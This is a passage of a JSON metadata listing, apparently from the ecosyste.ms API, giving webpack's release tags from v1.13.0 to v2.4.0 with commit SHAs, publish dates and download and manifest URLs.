webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G